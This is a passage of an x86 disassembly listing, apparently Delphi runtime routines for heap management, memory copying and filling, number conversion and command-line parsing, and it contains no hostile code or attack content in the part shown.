call sub_4010EC ; RtlLeaveCriticalSection
locret_4022FB: ; CODE XREF: sub_402160+18F�j
retn
; ---------------------------------------------------------------------------
loc_4022FC: ; DATA XREF: sub_402160+30�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4022E8
; ---------------------------------------------------------------------------
loc_402303: ; CODE XREF: sub_402160+28�j
; sub_402160+111�j ...
mov eax, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_402160 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40230C proc near ; CODE XREF: sub_401BF0+1C�p
; sub_4026E8+8D�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
mov ebx, eax
xor eax, eax
mov ds:dword_4075B0, eax
cmp ds:byte_4075AC, 0
jnz short loc_402344
call sub_401904
test al, al
jnz short loc_402344
mov ds:dword_4075B0, 8
mov [ebp+var_4], 8
jmp loc_4024DA
; ---------------------------------------------------------------------------
loc_402344: ; CODE XREF: sub_40230C+17�j
; sub_40230C+20�j
xor edx, edx
push ebp
push offset loc_4024D3
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_402365
push offset dword_4075B4
call sub_4010E4 ; RtlEnterCriticalSection
loc_402365: ; CODE XREF: sub_40230C+4D�j
mov [ebp+var_8], ebx
mov eax, [ebp+var_8]
sub eax, 4
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ebx, [eax]
test bl, 2
jnz short loc_40238A
mov ds:dword_4075B0, 9
jmp loc_4024AA
; ---------------------------------------------------------------------------
loc_40238A: ; CODE XREF: sub_40230C+6D�j
dec ds:dword_40759C
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub ds:dword_4075A0, eax
test bl, 1
jz short loc_4023F8
mov eax, [ebp+var_8]
sub eax, 0Ch
mov eax, [eax+8]
cmp eax, 0Ch
jl short loc_4023BA
test eax, 80000003h
jz short loc_4023C9
loc_4023BA: ; CODE XREF: sub_40230C+A5�j
mov ds:dword_4075B0, 0Ah
jmp loc_4024AA
; ---------------------------------------------------------------------------
loc_4023C9: ; CODE XREF: sub_40230C+AC�j
mov edx, [ebp+var_8]
sub edx, eax
mov [ebp+var_10], edx
mov edx, [ebp+var_10]
cmp eax, [edx+8]
jz short loc_4023E8
mov ds:dword_4075B0, 0Ah
jmp loc_4024AA
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_40230C+CB�j
add ebx, eax
mov eax, [ebp+var_10]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
call sub_401ADC
loc_4023F8: ; CODE XREF: sub_40230C+97�j
and ebx, 7FFFFFFCh
mov eax, [ebp+var_8]
add eax, ebx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
cmp eax, ds:dword_407608
jnz short loc_40243D
sub ds:dword_407608, ebx
add ds:dword_407604, ebx
cmp ds:dword_407604, 3C00h
jle short loc_40242E
call sub_401EA8
loc_40242E: ; CODE XREF: sub_40230C+11B�j
xor eax, eax
mov [ebp+var_4], eax
call sub_403090
jmp loc_4024DA
; ---------------------------------------------------------------------------
loc_40243D: ; CODE XREF: sub_40230C+103�j
mov eax, [ebp+var_C]
mov eax, [eax]
test al, 2
jz short loc_402464
and eax, 7FFFFFFCh
cmp eax, 4
jge short loc_40245C
mov ds:dword_4075B0, 0Bh
jmp short loc_4024AA
; ---------------------------------------------------------------------------
loc_40245C: ; CODE XREF: sub_40230C+142�j
mov eax, [ebp+var_C]
or dword ptr [eax], 1
jmp short loc_4024A0
; ---------------------------------------------------------------------------
loc_402464: ; CODE XREF: sub_40230C+138�j
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
cmp dword ptr [eax+4], 0
jz short loc_402484
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0
jz short loc_402484
mov eax, [ebp+var_10]
cmp dword ptr [eax+8], 0Ch
jge short loc_402490
loc_402484: ; CODE XREF: sub_40230C+165�j
; sub_40230C+16D�j
mov ds:dword_4075B0, 0Bh
jmp short loc_4024AA
; ---------------------------------------------------------------------------
loc_402490: ; CODE XREF: sub_40230C+176�j
mov eax, [ebp+var_10]
mov eax, [eax+8]
add ebx, eax
mov eax, [ebp+var_10]
call sub_401ADC
loc_4024A0: ; CODE XREF: sub_40230C+156�j
mov edx, ebx
mov eax, [ebp+var_8]
call sub_401DB0
loc_4024AA: ; CODE XREF: sub_40230C+79�j
; sub_40230C+B8�j ...
mov eax, ds:dword_4075B0
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4024DA
loc_4024BF: ; CODE XREF: sub_40230C+1CC�j
cmp ds:byte_407035, 0
jz short locret_4024D2
push offset dword_4075B4
call sub_4010EC ; RtlLeaveCriticalSection
locret_4024D2: ; CODE XREF: sub_40230C+1BA�j
retn
; ---------------------------------------------------------------------------
loc_4024D3: ; DATA XREF: sub_40230C+3B�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_4024BF
; ---------------------------------------------------------------------------
loc_4024DA: ; CODE XREF: sub_40230C+33�j
; sub_40230C+12C�j
; DATA XREF: ...
mov eax, [ebp+var_4]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40230C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4024E4 proc near ; CODE XREF: sub_4026E8+4D�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov ebx, edx
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_4024FD
mov ebx, 0Ch
loc_4024FD: ; CODE XREF: sub_4024E4+12�j
sub eax, 4
mov [esp+1Ch+var_1C], eax
mov eax, [esp+1Ch+var_1C]
mov esi, [eax]
and esi, 7FFFFFFCh
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
cmp esi, ebx
jnz short loc_402522
mov al, 1
jmp loc_4026DF
; ---------------------------------------------------------------------------
loc_402522: ; CODE XREF: sub_4024E4+35�j
cmp esi, ebx
jle loc_4025BA
mov ebp, esi
sub ebp, ebx
mov edx, [esp+1Ch+var_18]
cmp edx, ds:dword_407608
jnz short loc_402566
sub ds:dword_407608, ebp
add ds:dword_407604, ebp
cmp ds:dword_407604, 0Ch
jge loc_4026C2
add ds:dword_407608, ebp
sub ds:dword_407604, ebp
mov ebx, esi
jmp loc_4026C2
; ---------------------------------------------------------------------------
loc_402566: ; CODE XREF: sub_4024E4+54�j
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
test byte ptr [eax], 2
jnz short loc_40258B
mov eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_14], eax
mov eax, [esp+1Ch+var_14]
add ebp, [eax+8]
mov eax, [esp+1Ch+var_14]
call sub_401ADC
loc_40258B: ; CODE XREF: sub_4024E4+8D�j
cmp ebp, 0Ch
jl short loc_4025B3
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov [esp+1Ch+var_18], eax
or ebp, 2
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_18]
add eax, 4
call sub_401BF0
jmp loc_4026C2
; ---------------------------------------------------------------------------
loc_4025B3: ; CODE XREF: sub_4024E4+AA�j
mov ebx, esi
jmp loc_4026C2
; ---------------------------------------------------------------------------
loc_4025BA: ; CODE XREF: sub_4024E4+40�j
; sub_4024E4+1D5�j
mov edi, ebx
sub edi, esi
mov eax, [esp+1Ch+var_18]
cmp eax, ds:dword_407608
jnz short loc_40262F
cmp edi, ds:dword_407604
jg short loc_402621
sub ds:dword_407604, edi
add ds:dword_407608, edi
cmp ds:dword_407604, 0Ch
jge short loc_4025FF
mov eax, ds:dword_407604
add ds:dword_407608, eax
add ebx, ds:dword_407604
xor eax, eax
mov ds:dword_407604, eax
loc_4025FF: ; CODE XREF: sub_4024E4+101�j
mov eax, ebx
sub eax, esi
add ds:dword_4075A0, eax
mov eax, [esp+1Ch+var_1C]
mov eax, [eax]
and eax, 80000003h
or ebx, eax
mov eax, [esp+1Ch+var_1C]
mov [eax], ebx
mov al, 1
jmp loc_4026DF
; ---------------------------------------------------------------------------
loc_402621: ; CODE XREF: sub_4024E4+EC�j
call sub_401EA8
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
loc_40262F: ; CODE XREF: sub_4024E4+E4�j
mov eax, [esp+1Ch+var_18]
test byte ptr [eax], 2
jnz short loc_402687
mov eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_14], eax
mov edx, [esp+1Ch+var_14]
mov ebp, [edx+8]
cmp edi, ebp
jle short loc_402655
add eax, ebp
mov [esp+1Ch+var_18], eax
sub edi, ebp
jmp short loc_402687
; ---------------------------------------------------------------------------
loc_402655: ; CODE XREF: sub_4024E4+165�j
mov eax, [esp+1Ch+var_14]
call sub_401ADC
sub ebp, edi
cmp ebp, 0Ch
jl short loc_402673
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov edx, ebp
call sub_401DB0
jmp short loc_4026C2
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_4024E4+17F�j
add ebx, ebp
mov eax, [esp+1Ch+var_1C]
add eax, ebx
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+var_18]
and dword ptr [eax], 0FFFFFFFEh
jmp short loc_4026C2
; ---------------------------------------------------------------------------
loc_402687: ; CODE XREF: sub_4024E4+152�j
; sub_4024E4+16F�j
mov eax, [esp+1Ch+var_18]
mov eax, [eax]
test eax, 80000000h
jz short loc_4026BE
and eax, 7FFFFFFCh
add eax, [esp+1Ch+var_18]
mov [esp+1Ch+var_18], eax
mov edx, edi
mov eax, [esp+1Ch+var_18]
call sub_401FAC
test al, al
jz short loc_4026BE
mov eax, [esp+1Ch+var_1C]
add eax, esi
mov [esp+1Ch+var_18], eax
jmp loc_4025BA
; ---------------------------------------------------------------------------
loc_4026BE: ; CODE XREF: sub_4024E4+1AE�j
; sub_4024E4+1CA�j
xor eax, eax
jmp short loc_4026DF
; ---------------------------------------------------------------------------
loc_4026C2: ; CODE XREF: sub_4024E4+69�j
; sub_4024E4+7D�j ...
mov eax, ebx
sub eax, esi
add ds:dword_4075A0, eax
mov eax, [esp+1Ch+var_1C]
mov eax, [eax]
and eax, 80000003h
or ebx, eax
mov eax, [esp+1Ch+var_1C]
mov [eax], ebx
mov al, 1
loc_4026DF: ; CODE XREF: sub_4024E4+39�j
; sub_4024E4+138�j ...
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4024E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4026E8 proc near ; CODE XREF: sub_402804+D�p
; DATA XREF: DATA:off_40602C�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
mov esi, edx
mov ebx, eax
cmp ds:byte_4075AC, 0
jnz short loc_402710
call sub_401904
test al, al
jnz short loc_402710
xor eax, eax
mov [ebp+var_4], eax
jmp loc_4027A8
; ---------------------------------------------------------------------------
loc_402710: ; CODE XREF: sub_4026E8+13�j
; sub_4026E8+1C�j
xor edx, edx
push ebp
push offset loc_4027A1
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp ds:byte_407035, 0
jz short loc_402731
push offset dword_4075B4
call sub_4010E4 ; RtlEnterCriticalSection
loc_402731: ; CODE XREF: sub_4026E8+3D�j
mov edx, esi
mov eax, ebx
call sub_4024E4
test al, al
jz short loc_402743
mov [ebp+var_4], ebx
jmp short loc_402780
; ---------------------------------------------------------------------------
loc_402743: ; CODE XREF: sub_4026E8+54�j
mov eax, esi
call sub_402160
mov [ebp+var_8], eax
mov eax, ebx
sub eax, 4
mov eax, [eax]
and eax, 7FFFFFFCh
sub eax, 4
cmp esi, eax
jge short loc_402762
mov eax, esi
loc_402762: ; CODE XREF: sub_4026E8+76�j
cmp [ebp+var_8], 0
jz short loc_40277A
mov edx, [ebp+var_8]
mov ecx, ebx
xchg eax, ecx
call sub_4028C8
mov eax, ebx
call sub_40230C
loc_40277A: ; CODE XREF: sub_4026E8+7E�j
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_402780: ; CODE XREF: sub_4026E8+59�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4027A8
loc_40278D: ; CODE XREF: sub_4026E8+BE�j
cmp ds:byte_407035, 0
jz short locret_4027A0
push offset dword_4075B4
call sub_4010EC ; RtlLeaveCriticalSection
locret_4027A0: ; CODE XREF: sub_4026E8+AC�j
retn
; ---------------------------------------------------------------------------
loc_4027A1: ; DATA XREF: sub_4026E8+2B�o
jmp loc_402FD4
; ---------------------------------------------------------------------------
jmp short loc_40278D
; ---------------------------------------------------------------------------
loc_4027A8: ; CODE XREF: sub_4026E8+23�j
; DATA XREF: sub_4026E8+A0�o
mov eax, [ebp+var_4]
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_4026E8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027B4 proc near ; CODE XREF: sub_4035F8+C�p
; sub_405078+22�p
var_8 = dword ptr -8
push ebx
push ecx
mov ebx, eax
test ebx, ebx
jle short loc_4027D6
mov eax, ebx
call ds:off_406024
mov [esp+8+var_8], eax
cmp [esp+8+var_8], 0
jnz short loc_4027DB
mov al, 1
call sub_4028AC
; ---------------------------------------------------------------------------
jmp short loc_4027DB
; ---------------------------------------------------------------------------
loc_4027D6: ; CODE XREF: sub_4027B4+6�j
xor eax, eax
mov [esp+8+var_8], eax
loc_4027DB: ; CODE XREF: sub_4027B4+17�j
; sub_4027B4+20�j
mov eax, [esp+8+var_8]
pop edx
pop ebx
retn
sub_4027B4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4027E4 proc near ; CODE XREF: sub_403560+1C�p
; sub_403584+21�p ...
push ebx
test eax, eax
jz short loc_4027FE
call ds:off_406028
mov ebx, eax
test ebx, ebx
jz short loc_402800
mov al, 2
call sub_4028AC
; ---------------------------------------------------------------------------
jmp short loc_402800
; ---------------------------------------------------------------------------
loc_4027FE: ; CODE XREF: sub_4027E4+3�j
xor ebx, ebx
loc_402800: ; CODE XREF: sub_4027E4+F�j
; sub_4027E4+18�j
mov eax, ebx
pop ebx
retn
sub_4027E4 endp
; =============== S U B R O U T I N E =======================================
sub_402804 proc near ; CODE XREF: sub_403854+22�p
mov ecx, [eax]
test ecx, ecx
jz short loc_40283C
test edx, edx
jz short loc_402826
push eax
mov eax, ecx
call ds:off_40602C
pop ecx
or eax, eax
jz short loc_402835
mov [ecx], eax
retn
; ---------------------------------------------------------------------------
loc_40281F: ; CODE XREF: sub_402804+2E�j
mov al, 2
jmp sub_4028AC
; ---------------------------------------------------------------------------
loc_402826: ; CODE XREF: sub_402804+8�j
mov [eax], edx
mov eax, ecx
call ds:off_406028
or eax, eax
jnz short loc_40281F
retn
; ---------------------------------------------------------------------------
loc_402835: ; CODE XREF: sub_402804+16�j
; sub_402804+48�j
mov al, 1
jmp sub_4028AC
; ---------------------------------------------------------------------------
loc_40283C: ; CODE XREF: sub_402804+4�j
test edx, edx
jz short locret_402850
push eax
mov eax, edx
call ds:off_406024
pop ecx
or eax, eax
jz short loc_402835
mov [ecx], eax
locret_402850: ; CODE XREF: sub_402804+3A�j
retn
sub_402804 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402854 proc near ; CODE XREF: sub_402860+42�p
; CODE:0040313F�p
mov ds:dword_406004, edx
call sub_403548
sub_402854 endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_402860 proc near ; CODE XREF: sub_4028AC+6�j
push ebx
push esi
mov esi, edx
mov ebx, eax
and bl, 7Fh
cmp ds:dword_407008, 0
jz short loc_40287C
mov edx, esi
mov eax, ebx
call ds:dword_407008
loc_40287C: ; CODE XREF: sub_402860+10�j
test bl, bl
jnz short loc_40288D
call sub_403BC4
mov ebx, [eax+4]
jmp short loc_40289C
; ---------------------------------------------------------------------------
loc_40288D: ; CODE XREF: sub_402860+1E�j
cmp bl, 18h
ja short loc_40289C
xor eax, eax
mov al, bl
mov bl, ds:byte_406030[eax]
loc_40289C: ; CODE XREF: sub_402860+2B�j
; sub_402860+30�j
xor eax, eax
mov al, bl
mov edx, esi
call sub_402854
sub_402860 endp
; ---------------------------------------------------------------------------
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4028AC proc near ; CODE XREF: sub_4027B4+1B�p
; sub_4027E4+13�p ...
and eax, 7Fh
mov edx, [esp+0]
jmp sub_402860
sub_4028AC endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4028B8 proc near ; CODE XREF: sub_402AD0+38�p
; sub_402AD0+4C�p
push ebx
mov ebx, eax
call sub_403BC4
mov [eax+4], ebx
pop ebx
retn
sub_4028B8 endp
; =============== S U B R O U T I N E =======================================
sub_4028C8 proc near ; CODE XREF: sub_4026E8+86�p
; sub_402B28+14�p ...
push esi
push edi
mov esi, eax
mov edi, edx
mov eax, ecx
cmp edi, esi
ja short loc_4028E7
jz short loc_402905
sar ecx, 2
js short loc_402905
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4028E7: ; CODE XREF: sub_4028C8+A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
sar ecx, 2
js short loc_402905
std
rep movsd
mov ecx, eax
and ecx, 3
add esi, 3
add edi, 3
rep movsb
cld
loc_402905: ; CODE XREF: sub_4028C8+C�j
; sub_4028C8+11�j ...
pop edi
pop esi
retn
sub_4028C8 endp
; =============== S U B R O U T I N E =======================================
sub_402908 proc near ; CODE XREF: sub_402A6C+44�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFE8h
mov [esp+28h+var_24], edx
mov [esp+28h+var_28], eax
mov esi, esp
lea edi, [esp+28h+var_14]
jmp short loc_402928
; ---------------------------------------------------------------------------
loc_40291E: ; CODE XREF: sub_402908+2B�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
loc_402928: ; CODE XREF: sub_402908+14�j
; sub_402908+3F�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_402935
cmp bl, 20h
jbe short loc_40291E
loc_402935: ; CODE XREF: sub_402908+26�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_402949
mov eax, [esi]
cmp byte ptr [eax+1], 22h
jnz short loc_402949
add dword ptr [esi], 2
jmp short loc_402928
; ---------------------------------------------------------------------------
loc_402949: ; CODE XREF: sub_402908+32�j
; sub_402908+3A�j
xor ebp, ebp
mov eax, [esi]
mov [esp+28h+var_1C], eax
jmp short loc_4029AE
; ---------------------------------------------------------------------------
loc_402953: ; CODE XREF: sub_402908+AB�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_40299A
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_40297A
; ---------------------------------------------------------------------------
loc_402966: ; CODE XREF: sub_402908+7D�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [edi]
sub eax, [esi]
add ebp, eax
mov eax, [edi]
mov [esi], eax
loc_40297A: ; CODE XREF: sub_402908+5C�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_402987
cmp bl, 22h
jnz short loc_402966
loc_402987: ; CODE XREF: sub_402908+78�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_4029AE
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_4029AE
; ---------------------------------------------------------------------------
loc_40299A: ; CODE XREF: sub_402908+50�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [edi]
sub eax, [esi]
add ebp, eax
mov eax, [edi]
mov [esi], eax
loc_4029AE: ; CODE XREF: sub_402908+49�j
; sub_402908+84�j ...
mov eax, [esi]
cmp byte ptr [eax], 20h
ja short loc_402953
mov eax, [esp+28h+var_24]
mov edx, ebp
call sub_403854
mov eax, [esp+28h+var_1C]
mov [esi], eax
mov eax, [esp+28h+var_24]
mov eax, [eax]
mov [esp+28h+var_18], eax
xor ebp, ebp
jmp short loc_402A4F
; ---------------------------------------------------------------------------
loc_4029D4: ; CODE XREF: sub_402908+14C�j
mov eax, [esi]
cmp byte ptr [eax], 22h
jnz short loc_402A2B
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_402A0B
; ---------------------------------------------------------------------------
loc_4029E7: ; CODE XREF: sub_402908+10E�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [esi]
cmp eax, [edi]
jnb short loc_402A0B
loc_4029F7: ; CODE XREF: sub_402908+101�j
mov eax, [esi]
mov al, [eax]
mov edx, [esp+28h+var_18]
mov [edx+ebp], al
inc dword ptr [esi]
inc ebp
mov eax, [esi]
cmp eax, [edi]
jb short loc_4029F7
loc_402A0B: ; CODE XREF: sub_402908+DD�j
; sub_402908+ED�j
mov eax, [esi]
mov bl, [eax]
test bl, bl
jz short loc_402A18
cmp bl, 22h
jnz short loc_4029E7
loc_402A18: ; CODE XREF: sub_402908+109�j
mov eax, [esi]
cmp byte ptr [eax], 0
jz short loc_402A4F
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [esi], eax
jmp short loc_402A4F
; ---------------------------------------------------------------------------
loc_402A2B: ; CODE XREF: sub_402908+D1�j
mov eax, [esi]
push eax
call sub_401028 ; CharNextA
mov [edi], eax
mov eax, [esi]
cmp eax, [edi]
jnb short loc_402A4F
loc_402A3B: ; CODE XREF: sub_402908+145�j
mov eax, [esi]
mov al, [eax]
mov edx, [esp+28h+var_18]
mov [edx+ebp], al
inc dword ptr [esi]
inc ebp
mov eax, [esi]
cmp eax, [edi]
jb short loc_402A3B
loc_402A4F: ; CODE XREF: sub_402908+CA�j
; sub_402908+115�j ...
mov eax, [esi]
cmp byte ptr [eax], 20h
ja loc_4029D4
mov eax, [esi]
mov [esp+28h+var_20], eax
mov eax, [esp+28h+var_20]
add esp, 18h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_402908 endp
; =============== S U B R O U T I N E =======================================
sub_402A6C proc near ; CODE XREF: sub_404FC4+1B�p
; CODE:004053F2�p
var_114 = dword ptr -114h
var_110 = byte ptr -110h
push ebx
push esi
add esp, 0FFFFFEF4h
mov ebx, edx
mov esi, eax
mov eax, ebx
call sub_403560
test esi, esi
jnz short loc_402AA3
push 105h
lea eax, [esp+118h+var_110]
push eax
push 0
call sub_401058 ; GetModuleFileNameA
mov ecx, eax
lea edx, [esp+114h+var_110]
mov eax, ebx
call sub_403624
jmp short loc_402AC4
; ---------------------------------------------------------------------------
loc_402AA3: ; CODE XREF: sub_402A6C+15�j
call sub_401048 ; GetCommandLineA
mov [esp+114h+var_114], eax
loc_402AAB: ; CODE XREF: sub_402A6C+56�j
mov edx, ebx
mov eax, [esp+114h+var_114]
call sub_402908
mov [esp+114h+var_114], eax
test esi, esi
jz short loc_402AC4
cmp dword ptr [ebx], 0
jz short loc_402AC4
dec esi
jmp short loc_402AAB
; ---------------------------------------------------------------------------
loc_402AC4: ; CODE XREF: sub_402A6C+35�j
; sub_402A6C+4E�j ...
add esp, 10Ch
pop esi
pop ebx
retn
sub_402A6C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402AD0 proc near ; CODE XREF: sub_403A24+1E�p
; sub_403A24+28�p ...
push ebx
push esi
mov ebx, eax
xor esi, esi
mov ax, [ebx+4]
cmp ax, 0D7B1h
jb short loc_402B0F
cmp ax, 0D7B3h
ja short loc_402B0F
and ax, 0D7B2h
cmp ax, 0D7B2h
jnz short loc_402AF7
mov eax, ebx
call dword ptr [ebx+1Ch]
mov esi, eax
loc_402AF7: ; CODE XREF: sub_402AD0+1E�j
test esi, esi
jnz short loc_402B02
mov eax, ebx
call dword ptr [ebx+24h]
mov esi, eax
loc_402B02: ; CODE XREF: sub_402AD0+29�j
test esi, esi
jz short loc_402B21
mov eax, esi
call sub_4028B8
jmp short loc_402B21
; ---------------------------------------------------------------------------
loc_402B0F: ; CODE XREF: sub_402AD0+E�j
; sub_402AD0+14�j
cmp ebx, offset dword_407038
jz short loc_402B21
mov eax, 67h
call sub_4028B8
loc_402B21: ; CODE XREF: sub_402AD0+34�j
; sub_402AD0+3D�j ...
mov eax, esi
pop esi
pop ebx
retn
sub_402AD0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B28 proc near ; CODE XREF: sub_4045CC+1F�p
; sub_404D90+1F�p
push ebx
mov bl, [edx]
cmp cl, bl
jbe short loc_402B31
mov ecx, ebx
loc_402B31: ; CODE XREF: sub_402B28+5�j
mov [eax], cl
inc edx
inc eax
and ecx, 0FFh
xchg eax, edx
call sub_4028C8
pop ebx
retn
sub_402B28 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B44 proc near ; CODE XREF: sub_403DA8+A�p
; sub_4040B4+7E�p ...
push edi
mov edi, eax
mov ch, cl
mov eax, ecx
shl eax, 10h
mov ax, cx
mov ecx, edx
sar ecx, 2
js short loc_402B61
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_402B61: ; CODE XREF: sub_402B44+12�j
pop edi
retn
sub_402B44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402B64 proc near ; CODE XREF: sub_402BC4+4�p
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_10 = dword ptr -10h
push ebx
push esi
push edi
push edx
sub esp, 14h
mov edi, ecx
mov esi, eax
cdq
xor eax, edx
sub eax, edx
mov ecx, 0Ah
xor ebx, ebx
loc_402B7B: ; CODE XREF: sub_402B64+24�j
xor edx, edx
div ecx
add edx, 30h
mov [esp+ebx+24h+var_24], dl
inc ebx
test eax, eax
jnz short loc_402B7B
test esi, esi
jge short loc_402B93
mov [esp+ebx+24h+var_24], 2Dh
inc ebx
loc_402B93: ; CODE XREF: sub_402B64+28�j
mov [edi], bl
inc edi
mov ecx, [esp+24h+var_10]
cmp ecx, 0FFh
jle short loc_402BA7
mov ecx, 0FFh
loc_402BA7: ; CODE XREF: sub_402B64+3C�j
sub ecx, ebx
jle short loc_402BB2
add [edi-1], cl
mov al, 20h
rep stosb
loc_402BB2: ; CODE XREF: sub_402B64+45�j
; sub_402B64+56�j
mov al, [esp+ebx-1]
mov [edi], al
inc edi
dec ebx
jnz short loc_402BB2
add esp, 18h
pop edi
pop esi
pop ebx
retn
sub_402B64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402BC4 proc near ; CODE XREF: sub_4045CC+12�p
; sub_404D90+12�p
mov ecx, edx
xor edx, edx
call sub_402B64
retn
sub_402BC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402BD0 proc near ; CODE XREF: sub_4039B0+41�p
; sub_4045C0+3�p ...
push ebx
push esi
push edi
mov esi, eax
push eax
test eax, eax
jz short loc_402C46
xor eax, eax
xor ebx, ebx
mov edi, 0CCCCCCCh
loc_402BE3: ; CODE XREF: sub_402BD0+19�j
mov bl, [esi]
inc esi
cmp bl, 20h
jz short loc_402BE3
mov ch, 0
cmp bl, 2Dh
jz short loc_402C54
cmp bl, 2Bh
jz short loc_402C56
loc_402BF7: ; CODE XREF: sub_402BD0+89�j
cmp bl, 24h
jz short loc_402C5B
cmp bl, 78h
jz short loc_402C5B
cmp bl, 58h
jz short loc_402C5B
cmp bl, 30h
jnz short loc_402C1E
mov bl, [esi]
inc esi
cmp bl, 78h
jz short loc_402C5B
cmp bl, 58h
jz short loc_402C5B
test bl, bl
jz short loc_402C3C
jmp short loc_402C22
; ---------------------------------------------------------------------------
loc_402C1E: ; CODE XREF: sub_402BD0+39�j
test bl, bl
jz short loc_402C4F
loc_402C22: ; CODE XREF: sub_402BD0+4C�j
; sub_402BD0+6A�j
sub bl, 30h
cmp bl, 9
ja short loc_402C4F
cmp eax, edi
ja short loc_402C4F
lea eax, [eax+eax*4]
add eax, eax
add eax, ebx
mov bl, [esi]
inc esi
test bl, bl
jnz short loc_402C22
loc_402C3C: ; CODE XREF: sub_402BD0+4A�j
dec ch
jz short loc_402C49
test eax, eax
jge short loc_402C98
jmp short loc_402C4F
; ---------------------------------------------------------------------------
loc_402C46: ; CODE XREF: sub_402BD0+8�j
; sub_402BD0+95�j
inc esi
jmp short loc_402C4F
; ---------------------------------------------------------------------------
loc_402C49: ; CODE XREF: sub_402BD0+6E�j
neg eax
jle short loc_402C98
js short loc_402C98
loc_402C4F: ; CODE XREF: sub_402BD0+50�j
; sub_402BD0+58�j ...
pop ebx
sub esi, ebx
jmp short loc_402C9B
; ---------------------------------------------------------------------------
